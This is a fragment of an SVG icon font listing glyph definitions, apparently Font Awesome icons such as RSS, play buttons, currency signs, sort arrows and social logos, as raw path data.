<glyph unicode="&#xf143;" d="M512 256q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM863 162q-13 232 -177 396t-396 177q-14 1 -24 -9t-10 -23v-128q0 -13 8.5 -22t21.5 -10q154 -11 264 -121t121 -264q1 -13 10 -21.5t22 -8.5h128q13 0 23 10 t9 24zM1247 161q-5 154 -56 297.5t-139.5 260t-205 205t-260 139.5t-297.5 56q-14 1 -23 -9q-10 -10 -10 -23v-128q0 -13 9 -22t22 -10q204 -7 378 -111.5t278.5 -278.5t111.5 -378q1 -13 10 -22t22 -9h128q13 0 23 10q11 9 9 23zM1536 1120v-960q0 -119 -84.5 -203.5 t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf144;" d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM1152 585q32 18 32 55t-32 55l-544 320q-31 19 -64 1q-32 -19 -32 -56v-640q0 -37 32 -56 q16 -8 32 -8q17 0 32 9z" />
<glyph unicode="&#xf145;" horiz-adv-x="1792" d="M1024 1084l316 -316l-572 -572l-316 316zM813 105l618 618q19 19 19 45t-19 45l-362 362q-18 18 -45 18t-45 -18l-618 -618q-19 -19 -19 -45t19 -45l362 -362q18 -18 45 -18t45 18zM1702 742l-907 -908q-37 -37 -90.5 -37t-90.5 37l-126 126q56 56 56 136t-56 136 t-136 56t-136 -56l-125 126q-37 37 -37 90.5t37 90.5l907 906q37 37 90.5 37t90.5 -37l125 -125q-56 -56 -56 -136t56 -136t136 -56t136 56l126 -125q37 -37 37 -90.5t-37 -90.5z" />
<glyph unicode="&#xf146;" d="M1280 576v128q0 26 -19 45t-45 19h-896q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h896q26 0 45 19t19 45zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5 t84.5 -203.5z" />
<glyph unicode="&#xf147;" horiz-adv-x="1408" d="M1152 736v-64q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h832q14 0 23 -9t9 -23zM1280 288v832q0 66 -47 113t-113 47h-832q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113zM1408 1120v-832q0 -119 -84.5 -203.5 t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf148;" horiz-adv-x="1024" d="M1018 933q-18 -37 -58 -37h-192v-864q0 -14 -9 -23t-23 -9h-704q-21 0 -29 18q-8 20 4 35l160 192q9 11 25 11h320v640h-192q-40 0 -58 37q-17 37 9 68l320 384q18 22 49 22t49 -22l320 -384q27 -32 9 -68z" />
<glyph unicode="&#xf149;" horiz-adv-x="1024" d="M32 1280h704q13 0 22.5 -9.5t9.5 -23.5v-863h192q40 0 58 -37t-9 -69l-320 -384q-18 -22 -49 -22t-49 22l-320 384q-26 31 -9 69q18 37 58 37h192v640h-320q-14 0 -25 11l-160 192q-13 14 -4 34q9 19 29 19z" />
<glyph unicode="&#xf14a;" d="M685 237l614 614q19 19 19 45t-19 45l-102 102q-19 19 -45 19t-45 -19l-467 -467l-211 211q-19 19 -45 19t-45 -19l-102 -102q-19 -19 -19 -45t19 -45l358 -358q19 -19 45 -19t45 19zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5 t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf14b;" d="M404 428l152 -152l-52 -52h-56v96h-96v56zM818 818q14 -13 -3 -30l-291 -291q-17 -17 -30 -3q-14 13 3 30l291 291q17 17 30 3zM544 128l544 544l-288 288l-544 -544v-288h288zM1152 736l92 92q28 28 28 68t-28 68l-152 152q-28 28 -68 28t-68 -28l-92 -92zM1536 1120 v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf14c;" d="M1280 608v480q0 26 -19 45t-45 19h-480q-42 0 -59 -39q-17 -41 14 -70l144 -144l-534 -534q-19 -19 -19 -45t19 -45l102 -102q19 -19 45 -19t45 19l534 534l144 -144q18 -19 45 -19q12 0 25 5q39 17 39 59zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960 q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf14d;" d="M1005 435l352 352q19 19 19 45t-19 45l-352 352q-30 31 -69 14q-40 -17 -40 -59v-160q-119 0 -216 -19.5t-162.5 -51t-114 -79t-76.5 -95.5t-44.5 -109t-21.5 -111.5t-5 -110.5q0 -181 167 -404q10 -12 25 -12q7 0 13 3q22 9 19 33q-44 354 62 473q46 52 130 75.5 t224 23.5v-160q0 -42 40 -59q12 -5 24 -5q26 0 45 19zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf14e;" d="M640 448l256 128l-256 128v-256zM1024 1039v-542l-512 -256v542zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103 t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf150;" d="M1145 861q18 -35 -5 -66l-320 -448q-19 -27 -52 -27t-52 27l-320 448q-23 31 -5 66q17 35 57 35h640q40 0 57 -35zM1280 160v960q0 13 -9.5 22.5t-22.5 9.5h-960q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5zM1536 1120 v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf151;" d="M1145 419q-17 -35 -57 -35h-640q-40 0 -57 35q-18 35 5 66l320 448q19 27 52 27t52 -27l320 -448q23 -31 5 -66zM1280 160v960q0 13 -9.5 22.5t-22.5 9.5h-960q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5zM1536 1120v-960 q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf152;" d="M1088 640q0 -33 -27 -52l-448 -320q-31 -23 -66 -5q-35 17 -35 57v640q0 40 35 57q35 18 66 -5l448 -320q27 -19 27 -52zM1280 160v960q0 14 -9 23t-23 9h-960q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h960q14 0 23 9t9 23zM1536 1120v-960q0 -119 -84.5 -203.5 t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf153;" horiz-adv-x="1024" d="M976 229l35 -159q3 -12 -3 -22.5t-17 -14.5l-5 -1q-4 -2 -10.5 -3.5t-16 -4.5t-21.5 -5.5t-25.5 -5t-30 -5t-33.5 -4.5t-36.5 -3t-38.5 -1q-234 0 -409 130.5t-238 351.5h-95q-13 0 -22.5 9.5t-9.5 22.5v113q0 13 9.5 22.5t22.5 9.5h66q-2 57 1 105h-67q-14 0 -23 9 t-9 23v114q0 14 9 23t23 9h98q67 210 243.5 338t400.5 128q102 0 194 -23q11 -3 20 -15q6 -11 3 -24l-43 -159q-3 -13 -14 -19.5t-24 -2.5l-4 1q-4 1 -11.5 2.5l-17.5 3.5t-22.5 3.5t-26 3t-29 2.5t-29.5 1q-126 0 -226 -64t-150 -176h468q16 0 25 -12q10 -12 7 -26 l-24 -114q-5 -26 -32 -26h-488q-3 -37 0 -105h459q15 0 25 -12q9 -12 6 -27l-24 -112q-2 -11 -11 -18.5t-20 -7.5h-387q48 -117 149.5 -185.5t228.5 -68.5q18 0 36 1.5t33.5 3.5t29.5 4.5t24.5 5t18.5 4.5l12 3l5 2q13 5 26 -2q12 -7 15 -21z" />
<glyph unicode="&#xf154;" horiz-adv-x="1024" d="M1020 399v-367q0 -14 -9 -23t-23 -9h-956q-14 0 -23 9t-9 23v150q0 13 9.5 22.5t22.5 9.5h97v383h-95q-14 0 -23 9.5t-9 22.5v131q0 14 9 23t23 9h95v223q0 171 123.5 282t314.5 111q185 0 335 -125q9 -8 10 -20.5t-7 -22.5l-103 -127q-9 -11 -22 -12q-13 -2 -23 7 q-5 5 -26 19t-69 32t-93 18q-85 0 -137 -47t-52 -123v-215h305q13 0 22.5 -9t9.5 -23v-131q0 -13 -9.5 -22.5t-22.5 -9.5h-305v-379h414v181q0 13 9 22.5t23 9.5h162q14 0 23 -9.5t9 -22.5z" />
<glyph unicode="&#xf155;" horiz-adv-x="1024" d="M978 351q0 -153 -99.5 -263.5t-258.5 -136.5v-175q0 -14 -9 -23t-23 -9h-135q-13 0 -22.5 9.5t-9.5 22.5v175q-66 9 -127.5 31t-101.5 44.5t-74 48t-46.5 37.5t-17.5 18q-17 21 -2 41l103 135q7 10 23 12q15 2 24 -9l2 -2q113 -99 243 -125q37 -8 74 -8q81 0 142.5 43 t61.5 122q0 28 -15 53t-33.5 42t-58.5 37.5t-66 32t-80 32.5q-39 16 -61.5 25t-61.5 26.5t-62.5 31t-56.5 35.5t-53.5 42.5t-43.5 49t-35.5 58t-21 66.5t-8.5 78q0 138 98 242t255 134v180q0 13 9.5 22.5t22.5 9.5h135q14 0 23 -9t9 -23v-176q57 -6 110.5 -23t87 -33.5 t63.5 -37.5t39 -29t15 -14q17 -18 5 -38l-81 -146q-8 -15 -23 -16q-14 -3 -27 7q-3 3 -14.5 12t-39 26.5t-58.5 32t-74.5 26t-85.5 11.5q-95 0 -155 -43t-60 -111q0 -26 8.5 -48t29.5 -41.5t39.5 -33t56 -31t60.5 -27t70 -27.5q53 -20 81 -31.5t76 -35t75.5 -42.5t62 -50 t53 -63.5t31.5 -76.5t13 -94z" />
<glyph unicode="&#xf156;" horiz-adv-x="898" d="M898 1066v-102q0 -14 -9 -23t-23 -9h-168q-23 -144 -129 -234t-276 -110q167 -178 459 -536q14 -16 4 -34q-8 -18 -29 -18h-195q-16 0 -25 12q-306 367 -498 571q-9 9 -9 22v127q0 13 9.5 22.5t22.5 9.5h112q132 0 212.5 43t102.5 125h-427q-14 0 -23 9t-9 23v102 q0 14 9 23t23 9h413q-57 113 -268 113h-145q-13 0 -22.5 9.5t-9.5 22.5v133q0 14 9 23t23 9h832q14 0 23 -9t9 -23v-102q0 -14 -9 -23t-23 -9h-233q47 -61 64 -144h171q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf157;" horiz-adv-x="1027" d="M603 0h-172q-13 0 -22.5 9t-9.5 23v330h-288q-13 0 -22.5 9t-9.5 23v103q0 13 9.5 22.5t22.5 9.5h288v85h-288q-13 0 -22.5 9t-9.5 23v104q0 13 9.5 22.5t22.5 9.5h214l-321 578q-8 16 0 32q10 16 28 16h194q19 0 29 -18l215 -425q19 -38 56 -125q10 24 30.5 68t27.5 61 l191 420q8 19 29 19h191q17 0 27 -16q9 -14 1 -31l-313 -579h215q13 0 22.5 -9.5t9.5 -22.5v-104q0 -14 -9.5 -23t-22.5 -9h-290v-85h290q13 0 22.5 -9.5t9.5 -22.5v-103q0 -14 -9.5 -23t-22.5 -9h-290v-330q0 -13 -9.5 -22.5t-22.5 -9.5z" />
<glyph unicode="&#xf158;" horiz-adv-x="1280" d="M1043 971q0 100 -65 162t-171 62h-320v-448h320q106 0 171 62t65 162zM1280 971q0 -193 -126.5 -315t-326.5 -122h-340v-118h505q14 0 23 -9t9 -23v-128q0 -14 -9 -23t-23 -9h-505v-192q0 -14 -9.5 -23t-22.5 -9h-167q-14 0 -23 9t-9 23v192h-224q-14 0 -23 9t-9 23v128 q0 14 9 23t23 9h224v118h-224q-14 0 -23 9t-9 23v149q0 13 9 22.5t23 9.5h224v629q0 14 9 23t23 9h539q200 0 326.5 -122t126.5 -315z" />
<glyph unicode="&#xf159;" horiz-adv-x="1792" d="M514 341l81 299h-159l75 -300q1 -1 1 -3t1 -3q0 1 0.5 3.5t0.5 3.5zM630 768l35 128h-292l32 -128h225zM822 768h139l-35 128h-70zM1271 340l78 300h-162l81 -299q0 -1 0.5 -3.5t1.5 -3.5q0 1 0.5 3t0.5 3zM1382 768l33 128h-297l34 -128h230zM1792 736v-64q0 -14 -9 -23 t-23 -9h-213l-164 -616q-7 -24 -31 -24h-159q-24 0 -31 24l-166 616h-209l-167 -616q-7 -24 -31 -24h-159q-11 0 -19.5 7t-10.5 17l-160 616h-208q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h175l-33 128h-142q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h109l-89 344q-5 15 5 28 q10 12 26 12h137q26 0 31 -24l90 -360h359l97 360q7 24 31 24h126q24 0 31 -24l98 -360h365l93 360q5 24 31 24h137q16 0 26 -12q10 -13 5 -28l-91 -344h111q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-145l-34 -128h179q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf15a;" horiz-adv-x="1280" d="M1167 896q18 -182 -131 -258q117 -28 175 -103t45 -214q-7 -71 -32.5 -125t-64.5 -89t-97 -58.5t-121.5 -34.5t-145.5 -15v-255h-154v251q-80 0 -122 1v-252h-154v255q-18 0 -54 0.5t-55 0.5h-200l31 183h111q50 0 58 51v402h16q-6 1 -16 1v287q-13 68 -89 68h-111v164 l212 -1q64 0 97 1v252h154v-247q82 2 122 2v245h154v-252q79 -7 140 -22.5t113 -45t82.5 -78t36.5 -114.5zM952 351q0 36 -15 64t-37 46t-57.5 30.5t-65.5 18.5t-74 9t-69 3t-64.5 -1t-47.5 -1v-338q8 0 37 -0.5t48 -0.5t53 1.5t58.5 4t57 8.5t55.5 14t47.5 21t39.5 30 t24.5 40t9.5 51zM881 827q0 33 -12.5 58.5t-30.5 42t-48 28t-55 16.5t-61.5 8t-58 2.5t-54 -1t-39.5 -0.5v-307q5 0 34.5 -0.5t46.5 0t50 2t55 5.5t51.5 11t48.5 18.5t37 27t27 38.5t9 51z" />
<glyph unicode="&#xf15b;" d="M1024 1024v472q22 -14 36 -28l408 -408q14 -14 28 -36h-472zM896 992q0 -40 28 -68t68 -28h544v-1056q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h800v-544z" />
<glyph unicode="&#xf15c;" d="M1468 1060q14 -14 28 -36h-472v472q22 -14 36 -28zM992 896h544v-1056q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h800v-544q0 -40 28 -68t68 -28zM1152 160v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704 q14 0 23 9t9 23zM1152 416v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704q14 0 23 9t9 23zM1152 672v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704q14 0 23 9t9 23z" />
<glyph unicode="&#xf15d;" horiz-adv-x="1664" d="M1191 1128h177l-72 218l-12 47q-2 16 -2 20h-4l-3 -20q0 -1 -3.5 -18t-7.5 -29zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23zM1572 -23 v-233h-584v90l369 529q12 18 21 27l11 9v3q-2 0 -6.5 -0.5t-7.5 -0.5q-12 -3 -30 -3h-232v-115h-120v229h567v-89l-369 -530q-6 -8 -21 -26l-11 -11v-2l14 2q9 2 30 2h248v119h121zM1661 874v-106h-288v106h75l-47 144h-243l-47 -144h75v-106h-287v106h70l230 662h162 l230 -662h70z" />
<glyph unicode="&#xf15e;" horiz-adv-x="1664" d="M1191 104h177l-72 218l-12 47q-2 16 -2 20h-4l-3 -20q0 -1 -3.5 -18t-7.5 -29zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23zM1661 -150 v-106h-288v106h75l-47 144h-243l-47 -144h75v-106h-287v106h70l230 662h162l230 -662h70zM1572 1001v-233h-584v90l369 529q12 18 21 27l11 9v3q-2 0 -6.5 -0.5t-7.5 -0.5q-12 -3 -30 -3h-232v-115h-120v229h567v-89l-369 -530q-6 -8 -21 -26l-11 -10v-3l14 3q9 1 30 1h248 v119h121z" />
<glyph unicode="&#xf160;" horiz-adv-x="1792" d="M736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23zM1792 -32v-192q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h832 q14 0 23 -9t9 -23zM1600 480v-192q0 -14 -9 -23t-23 -9h-640q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h640q14 0 23 -9t9 -23zM1408 992v-192q0 -14 -9 -23t-23 -9h-448q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h448q14 0 23 -9t9 -23zM1216 1504v-192q0 -14 -9 -23t-23 -9h-256 q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h256q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf161;" horiz-adv-x="1792" d="M1216 -32v-192q0 -14 -9 -23t-23 -9h-256q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h256q14 0 23 -9t9 -23zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192 q14 0 23 -9t9 -23zM1408 480v-192q0 -14 -9 -23t-23 -9h-448q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h448q14 0 23 -9t9 -23zM1600 992v-192q0 -14 -9 -23t-23 -9h-640q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h640q14 0 23 -9t9 -23zM1792 1504v-192q0 -14 -9 -23t-23 -9h-832 q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h832q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf162;" d="M1346 223q0 63 -44 116t-103 53q-52 0 -83 -37t-31 -94t36.5 -95t104.5 -38q50 0 85 27t35 68zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23 zM1486 165q0 -62 -13 -121.5t-41 -114t-68 -95.5t-98.5 -65.5t-127.5 -24.5q-62 0 -108 16q-24 8 -42 15l39 113q15 -7 31 -11q37 -13 75 -13q84 0 134.5 58.5t66.5 145.5h-2q-21 -23 -61.5 -37t-84.5 -14q-106 0 -173 71.5t-67 172.5q0 105 72 178t181 73q123 0 205 -94.5 t82 -252.5zM1456 882v-114h-469v114h167v432q0 7 0.5 19t0.5 17v16h-2l-7 -12q-8 -13 -26 -31l-62 -58l-82 86l192 185h123v-654h165z" />
<glyph unicode="&#xf163;" d="M1346 1247q0 63 -44 116t-103 53q-52 0 -83 -37t-31 -94t36.5 -95t104.5 -38q50 0 85 27t35 68zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9 t9 -23zM1456 -142v-114h-469v114h167v432q0 7 0.5 19t0.5 17v16h-2l-7 -12q-8 -13 -26 -31l-62 -58l-82 86l192 185h123v-654h165zM1486 1189q0 -62 -13 -121.5t-41 -114t-68 -95.5t-98.5 -65.5t-127.5 -24.5q-62 0 -108 16q-24 8 -42 15l39 113q15 -7 31 -11q37 -13 75 -13 q84 0 134.5 58.5t66.5 145.5h-2q-21 -23 -61.5 -37t-84.5 -14q-106 0 -173 71.5t-67 172.5q0 105 72 178t181 73q123 0 205 -94.5t82 -252.5z" />
<glyph unicode="&#xf164;" horiz-adv-x="1664" d="M256 192q0 26 -19 45t-45 19q-27 0 -45.5 -19t-18.5 -45q0 -27 18.5 -45.5t45.5 -18.5q26 0 45 18.5t19 45.5zM416 704v-640q0 -26 -19 -45t-45 -19h-288q-26 0 -45 19t-19 45v640q0 26 19 45t45 19h288q26 0 45 -19t19 -45zM1600 704q0 -86 -55 -149q15 -44 15 -76 q3 -76 -43 -137q17 -56 0 -117q-15 -57 -54 -94q9 -112 -49 -181q-64 -76 -197 -78h-36h-76h-17q-66 0 -144 15.5t-121.5 29t-120.5 39.5q-123 43 -158 44q-26 1 -45 19.5t-19 44.5v641q0 25 18 43.5t43 20.5q24 2 76 59t101 121q68 87 101 120q18 18 31 48t17.5 48.5 t13.5 60.5q7 39 12.5 61t19.5 52t34 50q19 19 45 19q46 0 82.5 -10.5t60 -26t40 -40.5t24 -45t12 -50t5 -45t0.5 -39q0 -38 -9.5 -76t-19 -60t-27.5 -56q-3 -6 -10 -18t-11 -22t-8 -24h277q78 0 135 -57t57 -135z" />
<glyph unicode="&#xf165;" horiz-adv-x="1664" d="M256 960q0 -26 -19 -45t-45 -19q-27 0 -45.5 19t-18.5 45q0 27 18.5 45.5t45.5 18.5q26 0 45 -18.5t19 -45.5zM416 448v640q0 26 -19 45t-45 19h-288q-26 0 -45 -19t-19 -45v-640q0 -26 19 -45t45 -19h288q26 0 45 19t19 45zM1545 597q55 -61 55 -149q-1 -78 -57.5 -135 t-134.5 -57h-277q4 -14 8 -24t11 -22t10 -18q18 -37 27 -57t19 -58.5t10 -76.5q0 -24 -0.5 -39t-5 -45t-12 -50t-24 -45t-40 -40.5t-60 -26t-82.5 -10.5q-26 0 -45 19q-20 20 -34 50t-19.5 52t-12.5 61q-9 42 -13.5 60.5t-17.5 48.5t-31 48q-33 33 -101 120q-49 64 -101 121 t-76 59q-25 2 -43 20.5t-18 43.5v641q0 26 19 44.5t45 19.5q35 1 158 44q77 26 120.5 39.5t121.5 29t144 15.5h17h76h36q133 -2 197 -78q58 -69 49 -181q39 -37 54 -94q17 -61 0 -117q46 -61 43 -137q0 -32 -15 -76z" />
<glyph unicode="&#xf166;" d="M919 233v157q0 50 -29 50q-17 0 -33 -16v-224q16 -16 33 -16q29 0 29 49zM1103 355h66v34q0 51 -33 51t-33 -51v-34zM532 621v-70h-80v-423h-74v423h-78v70h232zM733 495v-367h-67v40q-39 -45 -76 -45q-33 0 -42 28q-6 16 -6 54v290h66v-270q0 -24 1 -26q1 -15 15 -15 q20 0 42 31v280h67zM985 384v-146q0 -52 -7 -73q-12 -42 -53 -42q-35 0 -68 41v-36h-67v493h67v-161q32 40 68 40q41 0 53 -42q7 -21 7 -74zM1236 255v-9q0 -29 -2 -43q-3 -22 -15 -40q-27 -40 -80 -40q-52 0 -81 38q-21 27 -21 86v129q0 59 20 86q29 38 80 38t78 -38 q21 -28 21 -86v-76h-133v-65q0 -51 34 -51q24 0 30 26q0 1 0.5 7t0.5 16.5v21.5h68zM785 1079v-156q0 -51 -32 -51t-32 51v156q0 52 32 52t32 -52zM1318 366q0 177 -19 260q-10 44 -43 73.5t-76 34.5q-136 15 -412 15q-275 0 -411 -15q-44 -5 -76.5 -34.5t-42.5 -73.5 q-20 -87 -20 -260q0 -176 20 -260q10 -43 42.5 -73t75.5 -35q137 -15 412 -15t412 15q43 5 75.5 35t42.5 73q20 84 20 260zM563 1017l90 296h-75l-51 -195l-53 195h-78l24 -69t23 -69q35 -103 46 -158v-201h74v201zM852 936v130q0 58 -21 87q-29 38 -78 38q-51 0 -78 -38 q-21 -29 -21 -87v-130q0 -58 21 -87q27 -38 78 -38q49 0 78 38q21 27 21 87zM1033 816h67v370h-67v-283q-22 -31 -42 -31q-15 0 -16 16q-1 2 -1 26v272h-67v-293q0 -37 6 -55q11 -27 43 -27q36 0 77 45v-40zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960 q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf167;" d="M971 292v-211q0 -67 -39 -67q-23 0 -45 22v301q22 22 45 22q39 0 39 -67zM1309 291v-46h-90v46q0 68 45 68t45 -68zM343 509h107v94h-312v-94h105v-569h100v569zM631 -60h89v494h-89v-378q-30 -42 -57 -42q-18 0 -21 21q-1 3 -1 35v364h-89v-391q0 -49 8 -73 q12 -37 58 -37q48 0 102 61v-54zM1060 88v197q0 73 -9 99q-17 56 -71 56q-50 0 -93 -54v217h-89v-663h89v48q45 -55 93 -55q54 0 71 55q9 27 9 100zM1398 98v13h-91q0 -51 -2 -61q-7 -36 -40 -36q-46 0 -46 69v87h179v103q0 79 -27 116q-39 51 -106 51q-68 0 -107 -51 q-28 -37 -28 -116v-173q0 -79 29 -116q39 -51 108 -51q72 0 108 53q18 27 21 54q2 9 2 58zM790 1011v210q0 69 -43 69t-43 -69v-210q0 -70 43 -70t43 70zM1509 260q0 -234 -26 -350q-14 -59 -58 -99t-102 -46q-184 -21 -555 -21t-555 21q-58 6 -102.5 46t-57.5 99 q-26 112 -26 350q0 234 26 350q14 59 58 99t103 47q183 20 554 20t555 -20q58 -7 102.5 -47t57.5 -99q26 -112 26 -350zM511 1536h102l-121 -399v-271h-100v271q-14 74 -61 212q-37 103 -65 187h106l71 -263zM881 1203v-175q0 -81 -28 -118q-37 -51 -106 -51q-67 0 -105 51 q-28 38 -28 118v175q0 80 28 117q38 51 105 51q69 0 106 -51q28 -37 28 -117zM1216 1365v-499h-91v55q-53 -62 -103 -62q-46 0 -59 37q-8 24 -8 75v394h91v-367q0 -33 1 -35q3 -22 21 -22q27 0 57 43v381h91z" />
<glyph unicode="&#xf168;" horiz-adv-x="1408" d="M597 869q-10 -18 -257 -456q-27 -46 -65 -46h-239q-21 0 -31 17t0 36l253 448q1 0 0 1l-161 279q-12 22 -1 37q9 15 32 15h239q40 0 66 -45zM1403 1511q11 -16 0 -37l-528 -934v-1l336 -615q11 -20 1 -37q-10 -15 -32 -15h-239q-42 0 -66 45l-339 622q18 32 531 942 q25 45 64 45h241q22 0 31 -15z" />
<glyph unicode="&#xf169;" d="M685 771q0 1 -126 222q-21 34 -52 34h-184q-18 0 -26 -11q-7 -12 1 -29l125 -216v-1l-196 -346q-9 -14 0 -28q8 -13 24 -13h185q31 0 50 36zM1309 1268q-7 12 -24 12h-187q-30 0 -49 -35l-411 -729q1 -2 262 -481q20 -35 52 -35h184q18 0 25 12q8 13 -1 28l-260 476v1 l409 723q8 16 0 28zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf16a;" horiz-adv-x="1792" d="M1280 640q0 37 -30 54l-512 320q-31 20 -65 2q-33 -18 -33 -56v-640q0 -38 33 -56q16 -8 31 -8q20 0 34 10l512 320q30 17 30 54zM1792 640q0 -96 -1 -150t-8.5 -136.5t-22.5 -147.5q-16 -73 -69 -123t-124 -58q-222 -25 -671 -25t-671 25q-71 8 -124.5 58t-69.5 123 q-14 65 -21.5 147.5t-8.5 136.5t-1 150t1 150t8.5 136.5t22.5 147.5q16 73 69 123t124 58q222 25 671 25t671 -25q71 -8 124.5 -58t69.5 -123q14 -65 21.5 -147.5t8.5 -136.5t1 -150z" />
<glyph unicode="&#xf16b;" horiz-adv-x="1792" d="M402 829l494 -305l-342 -285l-490 319zM1388 274v-108l-490 -293v-1l-1 1l-1 -1v1l-489 293v108l147 -96l342 284v2l1 -1l1 1v-2l343 -284zM554 1418l342 -285l-494 -304l-338 270zM1390 829l338 -271l-489 -319l-343 285zM1239 1418l489 -319l-338 -270l-494 304z" />
<glyph unicode="&#xf16c;" d="M1289 -96h-1118v480h-160v-640h1438v640h-160v-480zM347 428l33 157l783 -165l-33 -156zM450 802l67 146l725 -339l-67 -145zM651 1158l102 123l614 -513l-102 -123zM1048 1536l477 -641l-128 -96l-477 641zM330 65v159h800v-159h-800z" />
